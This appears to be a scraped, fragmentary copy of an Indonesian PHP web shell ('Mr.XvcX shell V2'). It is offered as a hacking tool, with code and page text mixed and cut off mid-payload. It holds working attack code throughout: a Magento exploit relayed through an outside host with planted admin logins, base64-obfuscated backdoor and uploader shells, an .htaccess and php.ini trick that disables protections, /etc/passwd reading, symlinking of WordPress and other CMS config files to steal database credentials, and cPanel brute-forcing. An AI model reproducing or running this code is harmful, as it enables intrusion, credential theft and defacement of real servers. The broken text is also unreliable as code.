Mr.XvcX shell V2

[+] Shell Xploit V2[+]
## -= LODXploit - Mr.XvcX =- ##
## Thanks to: +[Fatoni.id-IndoXploit-Pekalongan Blackhat-Github]+ ##
## Recoded by Mr.XvcX V2 | LODXploit ##

"; } function ngcurl($url,$post=null) { $ch = curl_init($url); if($post != null) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); return curl_exec($ch); curl_close($ch); } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } echo cover(); ?> $url, "hajar" => "Xploit!", ); $curl_fatoni = ngcurl("http://fatoni.id/malangXploit.php", $post_to_fatoni); if(preg_match("/Exploiting Success, mulai mengecek login../", $curl_fatoni)) { echo "Target: $url
"; echo "Status: Sukses Di Kill
"; echo "Ngecek Lokasi........ "; $ambil = htmlspecialchars(@file_get_contents($url)); preg_match("//", $ambil, $key); $post_login = array( "form_key" => $key[1], "login[username]" => "makassar", "dummy" => "", "login[password]" => "makassar1", ); $login = ngcurl($url."/admin/", $post_login); if(preg_match("/Log Out|makassar/", $login)) { $key2 = ambilKata($login,"/filesystem/adminhtml_filesystem/index/key/","/"); $key3 = ambilKata($login,"/system_account/index/key/","/"); echo "OK
"; echo "username: makassar
"; echo "password: makassar1
"; echo "Filesystem: "; $curl_filesystem = ngcurl($url."/filesystem/adminhtml_filesystem/index/key/$key2/", null); if(preg_match("/File System/", $curl_filesystem)) { echo "Ada
"; } else { echo "Gaada
"; } echo "Downloader: "; $post_downloader = array( "username" => "makassar", "password" => "makassar1", ); $url_d = parse_url($url, PHP_URL_HOST); $curl_downloader = ngcurl($url_d."/downloader/", $post_downloader); if(preg_match("/Return to Admin|Log Out/i", $curl_downloader)) { if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) { $stat_down = "Permissions"; } else { $stat_down = "Permissions"; } echo "Ada [ http://$url_d/downloader/ ( $stat_down ) ]
"; } else { echo "Gaada
"; } } else { echo "Gagal
"; } echo "
"; } else { echo "Target: $url
"; echo "Status: Gagal Di Kill

"; } } } else { ?> Mr.XvcX shell V2

============================================== -| Mr.XvcX And Kop1_5ianida|-
==============================================
Jquery

*nb: webnya belum gua stel jdi , jika lu punya send aja ke www.facebook.com/OM.Dhyo
============================================== -| Massage : Gunakan Dengan Bijak|-
==============================================
csrf_balitbang

*nb: webnya belum gua stel jdi , jika lu punya send aja ke www.facebook.com/OM.Dhyo

*nb: Itu ddos online udh gua set web pokemon.
============================================== -| Bonus! Jika Gak Work Cp:www.facebook.com/OM.Dhyo|-
============================================== "; $create_file = bikin_file("$dir_baru/$nama", "$script"); $baa = buka_dir($dir_baru); } else{ echo "Dir ngk writeable"; } } } } else{ echo "Dir ngk Writeable"; } } if($_POST){ $cwd = $_POST['dir']; $coba = buka_dir($cwd); echo $coba; } else{ echo '
INDO}{PLOIT

Tool Mass Deface

*Nb: gw saranin jangan tebas index. '; } ?>
============================================== -| Kini Shell Mr.XvcX V2 ada Cpanel Crack Loh ! Bantu Share|-
==============================================
Cpanel Cracker

|| ./Uploader | ./Config | ./B-F Config Cpanel | ./Cpanel BruteForce ||

"; if(isset($_REQUEST['do'])){ switch ($_REQUEST['do']){ ################php info case 'bhconfig'; echo "
+--==[ B-F Config ]==--+

"; mkdir('bconfig', 0755); chdir('bconfig'); $akses = ".htaccess"; $buka_lah = "$akses"; $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-php .cpc "; fwrite ( $buka , $metin ) ; fclose ($buka); $confshell = 'PD9waHAgLyogfHwgSWRlYSA6OiBNci5BbHNhM2VrIHx8IFByb2dyYW1taW5nIDo6IEctQiB8fCBEZXNpZ25lciA6OiBBbC1Td2lzcmUgfHwgKi8kT09PMDAwMDAwPXVybGRlY29kZSgnJTY2JTY3JTM2JTczJTYyJTY1JTY4JTcwJTcyJTYxJTM0JTYzJTZmJTVmJTc0JTZlJTY0Jyk7JE9PTzAwMDBPMD0kT09PMDAwMDAwezR9LiRPT08wMDAwMDB7OX0uJE9PTzAwMDAwMHszfS4kT09PMDAwMDAwezV9OyRPT08wMDAwTzAuPSRPT08wMDAwMDB7Mn0uJE9PTzAwMDAwMHsxMH0uJE9PTzAwMDAwMHsxM30uJE9PTzAwMDAwMHsxNn07JE9PTzAwMDBPMC49JE9PTzAwMDBPMHszfS4kT09PMDAwMDAwezExfS4kT09PMDAwMDAwezEyfS4kT09PMDAwME8wezd9LiRPT08wMDAwMDB7NX07JE9PTzAwME8wMD0kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MTJ9LiRPT08wMDAwMDB7N30uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezE1fTskTzBPMDAwTzAwPSRPT08wMDAwMDB7MH0uJE9PTzAwMDAwMHsxfS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTR9OyRPME8wMDBPME89JE8wTzAwME8wMC4kT09PMDAwMDAwezExfTskTzBPMDAwTzAwPSRPME8wMDBPMDAuJE9PTzAwMDAwMHszfTskTzBPMDBPTzAwPSRPT08wMDAwMDB7MH0uJE9PTzAwMDAwMHs4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7OX0uJE9PTzAwMDAwMHsxNn07JE9PTzAwMDAwTz0kT09PMDAwMDAwezN9LiRPT08wMDAwMDB7MTR9LiRPT08wMDAwMDB7OH0uJE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHs4fTskT09PME8wTzAwPV9fRklMRV9fOyRPTzAwTzAwMDA9MHgxMDdjO2V2YWwoJE9PTzAwMDBPMCgnSkU4d01EQlBNRTh3TUQwa1QwOVBNREF3VHpBd0tDUlBUMDh3VHpCUE1EQXNKM0ppSnlrN0pFOHdUekF3VDA4d01DZ2tUekF3TUU4d1R6QXdMREI0TkdNMEtUc2tUMDh3TUU4d01FOHdQU1JQVDA4d01EQXdUekFvSkU5UFR6QXdNREF3VHlna1R6QlBNREJQVHpBd0tDUlBNREF3VHpCUE1EQXNNSGd4TjJNcExDZEZiblJsY25sdmRYZHJhRkpJV1V0T1YwOVZWRUZoUW1KRFkwUmtSbVpIWjBscFNtcE1iRTF0VUhCUmNWTnpWblpZZUZwNk1ERXlNelExTmpjNE9Tc3ZQU2NzSjBGQ1EwUkZSa2RJU1VwTFRFMU9UMUJSVWxOVVZWWlhXRmxhWVdKalpHVm1aMmhwYW10c2JXNXZjSEZ5YzNSMWRuZDRlWG93TVRJek5EVTJOemc1S3k4bktTazdaWFpoYkNna1QwOHdNRTh3TUU4d0tUcz0nKSk7cmV0dXJuOz8+fkRrcjlOSGVuTkhlbk5IZTF6ZnVrZ0ZNYVhkb3lqY1VJbWIxOW9VQXh5YjE4bVJ0d213SjRMVDA5TkhyOFhUekVYUkp3bXdKWExUMDlOSGVFWEhyOFhodE9OVDA4WEhlRVhIcjhQa3I4WFR6RVhUMDhYSHRJTFR6RVhIcjhYVHpFWFJ0T05UekVYVHpFWEhlRXBSdGZ5ZG1PbEZtbHZmYmZxRHlrd0JBc0thMDlhYXJ5aVdNa2VDME9MT01jdWMwbHBVTXBIZHIxc0F1bk9GYVl6YW1jQ0d5cDZIZXJaSHpXMVlqRjRLVVN2TlVGU2sweXRXME95T0xmd1VBcFJUcjFLVDFuT0FsWUFhYWNiQnlsRENCa2pjb2FNYzJpcERNc1NkQjV2RnV5WkYzTzFmbWY0R2JQWEhUd3pZZUEyWXpJNWhaOG1oVUxwSzJjamRvOXpjVUlMVHpFWEhyOFhUekVYaFRzbGZNeVNodE9OVHpFWFR6RVhUekVwS1g9PXRtWWxmeTkwREIxbGIyeHBkQmwwaGVFcEtYcGxGbWt2Rmw5WmNibnZGbU9wZE1GUEh0TDd0TWxNaG9sekYyYTBodE9nQXI5VGF5U21mYmtTazEwcGhiU2hrdWFaZHRFOXd0T2dBcjlUYXlTbWZia1NrMTA3dG0xbGR1WWxHWFBMZmJrU3dlMElrMmkwZnVFNlJaOTNmM0ZWa3pTaGdXcGxDMml2d3RGOHdBT05XMU9jQXJBSVV5T1lUZTRoTm9pMGRCWCt0anhQY0J5TE5JUDhmb2wwZG9BK1dKMW93cll2ZE1jcGMxOWpBb3lWY0JYOFIzT3Bmb3hsTklQOEYzTzVkb0FJZnVsWGNUMEpmb2E0ZnQ5akYzSEpOSVBoQ005TEdiU2h3dEVJZEJ5WmMybFZ3ZVBJQ2JhMGR6U2h3dEVJQ015akQyZlpkM2FWY3QxamQyeHZGalBqY2pjTVlNQzJLWFBJd3RuamQyeHZGalBJd3pIektUTDVLVFNod3RFSWNNOVZmdDFNQ0IxcGR1TDZ3dU9pRG85c0NVWEljMmFWY2JjaVJ0blNmQllwY29yU2R1YWpEQk9pd29mWkNCNUxjVVhJQ2JrcENCWFN3b2lsZHVjbGZvbGpDVVhJRjJ5VkZaMXpjYmtwY2pTaHd0RUljTTlWZnQxTUNCMXBkdUw2d2VyMEZ1STd0SkVJd3VPbEd1V3NDQnhwYzI0NndvWWxkbU9sRmpTaHd0RUl3b2N2ZG1Xc2YyYXBjMmkwS0puSmQyeEx3ZVNoZ1dQaERCNVhmYldTZm9hNGZveVpjQnJTRjJhU2NCWTBHWHBNZDI1MFJiZmxEQmZQZmVQSUNNOVNjZVNoQzI5U2QzdzZ3dEhYSGVFWEhlRTd0TWt2Rk1PbEZqUElIYm40d3VZdmRvbEx3dFllVzBZZVcwSDd0TWtpQzJzbUZNOTFkTVdzQzI5U2QzdzZ3dWZQRGJPbEtYcFhDQk9MREI1bUtKRXpGdUk3dE1rdkZNT2xGSjFaQ0JPcGZiSDZ3ZWZYR2VTaGdXUGhEQjVYZmJXNmNNOWpmYlk3dElQSUNNOTRSYllQQ0JPdmZ6UElIdW40d2VuWEd0RTFGdUlJd3pFWEtBQzVPalNodG0waHcyY3ZkM09sRkpFSUdYUGhDMjlTZDN3Nnd0SFhIZUVYSGVFN3RNY3ZkbVdzY015c0RCeDVLSkV4WXVuNEtYcDBjYmkwUmJZUENCT3ZmelBJSHVuNHdlblhHdEV4RnVJSXd6RVhIZUVYSGVTaGNNOVZmdDEzY0JsbUR1VzZ3bzV2Rk0xaWRlU2hnV3BpR1hQSXd1T2xHdVdzY29hamQza2lmb2x2ZGpQSWRNOVZjVFNod3RuamQyeHZGalBqSHpIekh6SHpLWHA5dGpYdkYzTzVkb0ErdGpYdkRvYWljZTRoTm9rdmN1TCt0anhMRGJDSURCVzl3bU92ZDJYSk5JUDhVZXJJRjNPNWRvQTl3TVl2ZG85WktKRWpZZVcwWWVXMEtabjBjYmkwUmJZUENCT3ZmelBJSHVuNHdlblhHdEV4RnVJSXd6RVhIZUVYSHR3N2ZvYTRmdDFpZG9sbWRqUElDMmFWZm9hWkt6NXRSQUNJVzI5VmNNbG1iMllXQ0I1bGRlWHZVZXIrdGp4TWQza3N3bzFsZm9pdmNlMEpBcjlUYXR3K3RqeHBkbW4xZnRuVkNCMWxOVWsxRk1YSnd1TzVGb0E5d21PbEd1V0p3dWNpZHVhbE5Vd21SSk8xRk1YVmtad0lGMmw2Y1QwSlllRUp3dDgrdGp4cGRtbjFmdG4wR2JubE5Va3pmQmtzRGJXSnd1Y2lkdWFsTlVrVGZveVpmdEUrd0pFdk5JUDhSMmN2Rk0wK05va1p3dDgrTm9rWnd0OCtrelNoREJDUERiWXpjYldQa3k5V1QxWUFCWmYxRk1YbWJVTHBHWHBwY0pJaWNNbFNjYTltY2JPZ0MyOVZmb2FWZnVIUGt1YVpkdExwR1hwbEMyaXZ3dGZ5Rm1rdkZKNElVQjUyQ0J4cGN0bmFBTFhWa3pTaGdCYVNGMmE3dEpPaXdlMElIZVNoY005WmNCeWpEdGltY2JPZ2NveTBDVUlMZmJrU2hVbmlGWkVMREI1TWRabDd0TWxNaG94dmMybFZodE9wZE1jdkJ6bmZSdE9wZE1jdkJ6eWZoVWw3dE1hakRvOEl3anhKd3VZMEdCeGxOVUZJQzI5U2QzdzZ3dEg0SGVJWEtlRUlLWm4wY2JpMFJiWVBDQk92ZnpQWEZ1SUlIdW40d2V5WEd0RWpLZUU0SGVJWHdlU21ObFNxYlVuYUYyYVpkTXlzY1VFTXd5bmlGM1kzZDNrTHdlUDhSMncrd3RFOENKbnpmdWxTY1QwbXdvWXZkbzlaS0pFakhlRVhIcmNvd2VTSWZvYTRmdDF6RG95TGQzRjZIdW40d2VuWEd0RXhGdUlJd3pFWEhlbm9PSkU3a3o1ZGtvbFZjTTlkSHkxZk50OUpOSkU4Q0puemZ1bFNjVDBtd29ZdmRvOVpLSkVqVzBIWEhlRVhLWm4wY2JpMFJiWVBDQk92ZnpQWEZ1SUlIdW40d2V5WEd0RWpXMEhYSGVFWEtaRitCWk9wZE1jdkJ6eWZiVFh2Q2o0OENtd0lSejRKS1hQTENVU3FLWHA5dG0waGNCWVBkWkVKTm93SUYzTzVkb0E5a1puamQyeHZGalBJd3pJWEtlRTRIdEU3d3VPbEd1V3NGMmlpY285M0tqblhHdEVYRnVJSUhibjR3dEg0SGVJWEtlRUlLWkYrTm9pWk5KT2l3cllYQ0I1bGR0bm9kM2FWY29hTFJqeEpGSkV2Tkp3N3RtMGhnV3BsQzJpdnd0RjhDbXdJUno0OENtd0lSejQ4Q213SVJ6NDhDbXdJUno0OGNvbDJ3b2xMTlVrTWQyOTBjYndKTm14OHdybExjQnJJS2pQSVRid1ZXQnh6Q1RZbERabjhndG5XRk05bUZNeXNkQmxWY1pFNktKbnVSQXdJZ3VYSU9vYXpEQmZWY2J3SUtqUElXQlhzQTNmcEYza2x3dXg4d2VYdmNvbDJOSVA4UjJPcGZqNDhSMmt2Y3VMK3RqWHZEdU9zZGU0bUtYcE1mQjVqZm9sdmRKbmxHdElMQ1VYTENKWExmb2E0ZnRsN3RKT2xHdW5TZDJPbHdlMEljYmlYZG85TGNVSUxDVVhMZm9hNGZ0TDd0Sk9sR3VuU2QyT2x3ZTBJY2JpWGRvOUxjVUlMQ0pYTGNiaVhkbzlMY2FTeGJVTDd0bWtsZnVhWmRKRUxjYmlYZG85TGNhU1hiVFNoZ1dwTWZCNWpmb2x2ZEpuU2QyZnBkSklMZmJZbEZKWExGb3l6RlpsN3RKT2p3ZTBJV28xNUYzeVNiMll2ZE01bEMzV1BrMnh2QzJ5U0RvOXpmdEZTa3VhemNid1NrdW5pRjNIcEtYcHBjSklMQ1psN3RNMTVGM3lTYjJZU2QzWWxodE9qaFRTaEZNYTBmYmtWd3VPWmZCQTd0bTFsZHVZbEdYcFpjYk8xRk00SWNNeVNGMkE3dG0waGdXcE1mQjVqZm9sdmRKbm1jYk9nY295MENVSUxmYmtTaGJTaGtveVp3ZTBJQ2JrWkNiTFBrenJWZnVpMGtaWG1ISjUwR3VXbVJ0RnpSbU80ZnRGU2t6V1ZmdWkwa1pYbVlVNTBHdVdtUnRGMlJtTzRmdEZTa3pGVmZ1aTBrWlhtS3Q1MEd1V21SdEY1Um1PNGZ0RlNrekVWZnVpMGtaTDd0Sk96Rk1ISU5Vbk1EQnhsYjJmbGZ5OWpkMjUwY0I1MEZaSUxmYmtTaFRTaGtvY3Bkb2F6d2UwSWNiaVhkbzlMY1VJbU5vcklEdWtsY2owSmtaWExGM2tqaFRTaGtvT2lmb3JJTlVuaUZta2lHVUlwS1hwTWQza2xDQllQaHRPTURCeGxGWm5pRlpFTERCVzlOSk9NREJ4bGhiU2hEQkNQa29sTHdlMDl3ZUVwR1hwamQyNTBEQjUxY1RTaGdXUExjTWxTY1VFOXdvYTRGb3h2Y29BUGtadytrWlhMY01sU2NVTDd0Sk9NREJ4bHdlMElmdWtwZFVJTGNNbFNjYVNYYlVMN3RNbE1odHlsRk1hbURVSW1SbU80ZnRGU2tvY3Bkb0FwaGJTaEMyOVZmb2xWZkJBN3RtMGhrdVlaQ1pFOXdvY3Bkb2FnYzJhMGIyWXZkbU9sZG1Pemh0d0xmYmtTUlpPTURCeGx3Skw3dE1sTWh0ckxGM2tqaGJTaEMyOVZmb2xWZkJBN3RtMGhrdWF6Y2J3SU5VbnpmdWtnRk1hWGRveWpjVUlMQ2J3U2taRlNrb2NwZG9BcEtYUExmYllsRkpFOXd1WTBGbDlaY2JuU0NCWWxodE9pRkpYbWtaWExmYllsRko0bVJtTzRmdEZwS1hQTGZiWWxGSkU5d3VZMEZsOVpjYm5TQ0JZbGh0T2lGSlhta1pYTGZiWWxGSjRtUm1PNGZ0RnBLWFBMZmJZbEZKRTl3dU9aREIwUEYzT1piM2tsRm94aUMyQVBrWjUwR3VXbVJ0Rm1SdE8xRjJhWmhVTDd0TWxNaG9hWmNCZnBodGtiZDNrTEF1a2xGM0hKUnRPekZNSHBoYlNoa3VuaUYzSElOVW5sR3RJSmNvYU1EQjVsaHRmcldsOVdXYVlUYTA5VU90RlN3dEZKUnR3bWhUU0pSdE96Rk1IcEtYUExjb3kwQ2FzZndlMElDYmtaQ2JMUGt1YXpjYndTa3VuaUYzSHBLWHA5Y0J4emNiU2hrdU92RDJhVkZaRTl3dU92RDJhVmIyZmxmeTlpZG9YUGt1WVpDWkw3dE1jdkZNYWlDMklQa3VPdkQyYVZGWm5pRlpFTGZvOXFjQjRwR1hwcGNKSWlrdU92RDJhVkJ6eWZoYlNoQzI5VmZvbFZmQkE3dG0waGt1T3ZEMmFWZE15c2NVRTl3dU92RDJhVmIyNWlkQkFQa3VPdkQyYVZCem5maFRTaERCQ1BrdU92RDJhVmRNeXNjVUVpTlVFbWF5OUJXYWtrV0FrSE9VRnBHWHBqZDI1MERCNTFjVFNoZ1dQTGZNeVp3ZTBJa3VPdkQyYVZCenlmS1hwcGNKaWxGTWFtRFVJbUZveXpGWkZTa3VjaUZKTHBHWFBMY0pFOXd1WTBGbDlaY2JuU0NCWWxodEZJa1pYbWtaeGxHdElMZk15WlJ0RjdrWlhMRjNramhVTDd0Sk9pd2UwSWZ1a3BkVWlsR3RJSk5VRkpSdHdtd0pYTGNKTHBLWFBMQ0pFOXd1T1pEQjBQY2JJUGtad21SdEZKa1pYTGNKTHBLWHBwY0pJTENVRWlOVUVta1psN3RKT1hDYll6d2UwSWtvcjd0bTFsZHVZbERCQ1Brb3dJd1QwSWtaRnBHWFBMRm95ekZaRTl3dE9KS1hwOXRNbE1odE9YQ2JZendlMDl3dEZtaGJTaEMyOVZmb2xWZkJBN3RtMGhrb09pZm95ZGJVRTl3b3laRk15NWh0TzFGMmFaUnRPWENiWXpoVFNoZ1dwOXRtMGhnV3BaY2JPMUZNNElrb09pZm9yN3RtMGhLWD09YWxWblJQSXE='; $file = fopen("bhc.php" ,"w+"); $write = fwrite ($file ,base64_decode($confshell)); fclose($file); chmod("bhc.php", 0644); $indexshell = fopen("index.php" ,"w+"); $data = 'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+'; $tulis = fwrite( $indexshell, base64_decode($data)); fclose($indexshell); echo ""; break; ################CMS DETECTOR case 'config'; $byphp = "safe_mode = Off disable_functions = None "; file_put_contents("php.ini",$byphp); echo '+--=[ Config priv8 ]=--+

'; ?>
<?php $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?>

"; if(isset($_POST['su'])) { mkdir('Inject',0777); $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $g = fopen('Inject/.htaccess','w'); fwrite($g,$rr); $indishell = symlink("/","Inject/root"); $rt=" OwN3d"; echo "Please check link given below for / folder symlink
$rt"; $dir=mkdir('INJECTION',0777); $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $f = fopen('INJECTION/.htaccess','w'); fwrite($f,$r); $consym="configuration files"; echo "
The link given below for configuration file symlink...open it, once processing finish
$consym"; $usr=explode("\n",$_POST['user']); $configuration=array("wp-config.php", "wordpress/wp-config.php", "web/wp-config.php", "wp/wp-config.php", "press/wp-config.php", "wordpress/beta/wp-config.php", "news/wp-config.php", "new/wp-config.php", "blogs/wp-config.php", "home/wp-config.php", "blog/wp-config.php", "protal/wp-config.php", "site/wp-config.php", "main/wp-config.php", "test/wp-config.php", "wp/beta/wp-config.php", "beta/wp-config.php", "joomla/configuration.php", "protal/configuration.php", "joo/configuration.php", "cms/configuration.php", "site/configuration.php", "main/configuration.php", "news/configuration.php", "new/configuration.php", "home/configuration.php", "configuration.php", "SSI.php", "forum/SSI.php", "forum/inc/config.php", "forum/includes/config.php", "upload/includes/config.php", "cc/includes/config.php", "vb/includes/config.php", "vb3/includes/config.php", "cpanel/configuration.php", "panel/configuration.php", "ubmitticket.php", "manage/configuration.php", "myshop/configuration.php", "beta/configuration.php", "includes/config.php", "lib/config.php", "conf_global.php", "inc/config.php", "incl/config.php", "include/db.php", "include/config.php", "includes/functions.php", "includes/dist-configure.php", "connect.php", "mk_conf.php", "config/koneksi.php", "system/sistem.php", "config.php", "Settings.php", "settings.php", "sites/default/settings.php", "smf/Settings.php", "forum/Settings.php", "forums/Settings.php", "host/configuration.php", "hosting/configuration.php", "hosts/configuration.php", "zencart/includes/dist-configure.php", "shop/includes/dist-configure.php", "whm/configuration.php", "whmc/configuration.php", "whmcs/configuration.php", "whmc/WHM/configuration.php", "whm/WHMCS/configuration.php", "whm/whmcs/configuration.php", "order/configuration.php", "support/configuration.php", "supports/configuration.php", "oscommerce/includes/configure.php", "oscommerces/includes/configure.php", "shopping/includes/configure.php", "sale/includes/configure.php", "config.inc.php", "amember/config.inc.php", "clients/configuration.php", "client/configuration.php", "clientes/configuration.php", "cliente/configuration.php", "clientsupport/configuration.php", "billing/configuration.php", "billings/configuration.php", "admin/conf.php", "admin/config.php"); foreach($usr as $uss ) { $us=trim($uss); foreach($configuration as $c) { $rs="/home/".$us."/public_html/".$c; $r="INJECTION/".$us." .. ".$c; symlink($rs,$r); } } } break; /////////////////////////////////// case'file'; break; ################################### case 'brute';?> $user) Password is ($pass)
"; $ok++; } } } } echo "
You Found $ok Cpanel by Group XP"; echo "<< BACK"; exit; } } if($_POST['pass']=='password'){ @error_reporting(0); $i = getenv('REMOTE_ADDR'); $d = date('D, M jS, Y H:i',time()); $h = $_SERVER['HTTP_HOST']; $dir=$_SERVER['PHP_SELF']; $back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg=="; $file = fopen(".php","w+"); $write = fwrite ($file ,base64_decode($back)); fclose($file); chmod(".php",0755); mkdir('config',0755); $cp = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAg